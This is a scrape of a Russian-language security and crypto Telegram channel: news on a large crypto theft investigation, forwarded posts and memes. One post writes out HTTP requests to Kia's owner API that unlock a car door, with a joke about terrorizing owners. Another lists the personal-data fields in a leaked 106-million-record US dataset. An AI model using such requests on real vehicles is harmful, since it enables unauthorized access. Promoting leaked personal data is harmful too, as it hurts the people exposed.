папкин ИБшник, мамкин хацкер
55 subscribers
776 photos
78 videos
19 files
244 links
Круглосуточный уголок shit-постинга на темы около DevSecOps, Reverse-Enginnering, NetDiscovery, DataMining. Ну и конечно же мемесы.
Download Telegram
zachxbt.pdf
2.4 MB
йо.

Достаточно веселая PDFка содержит расследование о том, как группа мошенников, включая Greavys (Малон Лам), Wiz (Вир Четал) и Box (Жандиэль Серрано), украла 243 миллиона долларов у одного человека в результате сложной социальной инженерии.

Основные моменты:
- Методы атаки: Мошенники использовали подмену номера, выдавая себя за поддержку Google и Gemini, чтобы получить доступ к личным аккаунтам жертвы. Они убедили жертву сбросить двухфакторную аутентификацию и перевести средства на компрометированный кошелек.

- Трассировка средств: После кражи 243 миллиона долларов средства были быстро перераспределены между несколькими участниками и обменами, включая Bitcoin, Litecoin, Ethereum и Monero.

- Аресты: В результате расследования, поддержанного различными организациями, были арестованы Greavys и Box. Более 9 миллионов долларов было заморожено, а часть средств возвращена жертве.

- Детали: Дока также включает информацию о роскошной жизни мошенников после кражи, их социальных сетях и ошибках, которые привели к их идентификации.

Это расследование освещает не только саму кражу, но и методы работы правоохранительных органов в таких случаях.

Оч интересно.
А ты думал твой биток не отследят? (На самом деле да, если запариться)
Гори в аду тот мудак, который придумал писать в критические ошибки ОТМЕНУ ДЕЙСТВИЯ ПОЛЬЗОВАТЕЛЕМ.
Кстати, @tass_agency пишет:
Правительство России поддержало законопроект, который обяжет Apple разрешить установку российского магазина приложений RuStore, а также скачивание отечественных программ, платежи и другие функции. Однако парламентариям предложено доработать документ с учетом замечаний кабмина.

Посмотрим на то, что будет делать Apple, так как формально они соблюдают требования РФ.
😎
Please open Telegram to view this post
VIEW IN TELEGRAM
Просто оставлю это здесь.
Forwarded from vx-underground
We aren't surprised, we're surprised it took this long. Pavel Durov is a citizen of France, a NATO country.
Forwarded from Ньюсач/Двач
This media is not supported in your browser
VIEW IN TELEGRAM
Залезли полицейские в подвал, а там дагестанцы крипту майнят: владельцы майнинг-ферм в Дагестане начали устанавливать аппараты для незаконной добычи криптовалюты под землёй

Владельцы установки разместили под землёй более 15 аппаратов, сообщили в правоохранительных органах.
🗑 Наблюдаю картину уже третий месяц как колбасит крипту. Но заметил интересные приколы.

Включаю крипто-жабу 🤵, октябрь будет таким:
6-9 числа эфир снова рухнет до 198-208к,
20-23 числах поднимется до 248-256к.

Если это будет так - это будет забавно.
Обязательно отпишусь об этом.

Achtung:
Играть на этом - не советую. Сказанное не является инвестиционной рекомендацией.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Пекарня
Кроме кота по кличке «Хуй» в титрах Space Marine 2 заметили другие «необычные» имена питомцев разработчиков. Среди них:

🔴Еблуша
🔴Мусорка
🔴Кошка номер три

Разбираем
Please open Telegram to view this post
VIEW IN TELEGRAM
UltraAV (((totally not an Kaspersky sideware))) site be like:
ШТИРЛЕЦ ДАВНО НЕ БЫЛ ТАК БЛИЗКО К ПРОВАЛУ

(pango.co официально владелец большинства популярных VPN серверов, таких как UltaVPN, VPN360, BetterNet, OVPN, COSMOVPN, а так же UltraAV :DDDD)
1
USA dream life:
MC2DATA, USA, 106млн уникальных, 2 ТБ

Графы содержат:
• Полное имя
• Возраст
• Домашний адрес
• Электронную почту
• IP-адрес
• Номер телефона
• Платёжную информацию
• Юридические документы
• Зашифрованные пароли
• Трудовой стаж
• Данные семьи, родственников и соседей
Hamster - $0.0000000016, как дела?
Ключик Киа получить просто:
POST /apps/services/owners/apigwServlet.html HTTP/2
Host: owners.kia.com
Httpmethod: GET
Apiurl: /door/unlock
Servicetype: postLoginCustomer
Cookie: JSESSIONID=SESSION_TOKEN;


Делаем реквест к открытию двери:
GET /apigw/v1/rems/door/unlock HTTP/1.1
Host: api.owners.kia.com
Sid: 454817d4-b228-4103-a26f-884e362e8dee
Vinkey: 3ecc1a19-aefd-4188-a7fe-1723e1663d6e



Получаем ВИНуид.
Терроризируем владельцев.

Список попавших с 2025 модельного по 2018:

https://samcurry.net/hacking-kia

Там же подробные инструкции атаки.
🤣
Please open Telegram to view this post
VIEW IN TELEGRAM
Ну все, теперь точно устарело, даже неКасперский написали))
Forwarded from НеКасперский
Media is too big
VIEW IN TELEGRAM
Корейцы делают вещи

Высинилось, что большую часть KIA, выпущенных с 2014 года можно было взломать и угнать меньше чем за 30 секунд.

Да, в два раза быстрее, чем в фильме. Все машины, что поддерживали KIA Connect не были должным образом защищены. Причём не имело значение, есть ли у владельца авто подписка на сервис или нет.

Проблема свелась к корневому дилерскому центру KIA, который активировал машины. Через его API можно было создать фиктивный аккаунт и получать токены уже для доступа к KIA Connect. Злоумышленники получали доступ к камерам, функциям блокировки, удалённого запуска, геолокации, иллюминации и сигналу авто. Более того, через приложение раскрывали данные и о владельце: его имени, телефона, адреса и посты.

Нагляднее всего продемонстрировали эксплойт KIA Tool журналисты из Wierd, взломавшие машину одного из своих коллег.

Владельцев Stinger поздравляем, все модели до 2022 года почти никак не пострадали: у большинства можно узнать только геопозицию.

НеКасперский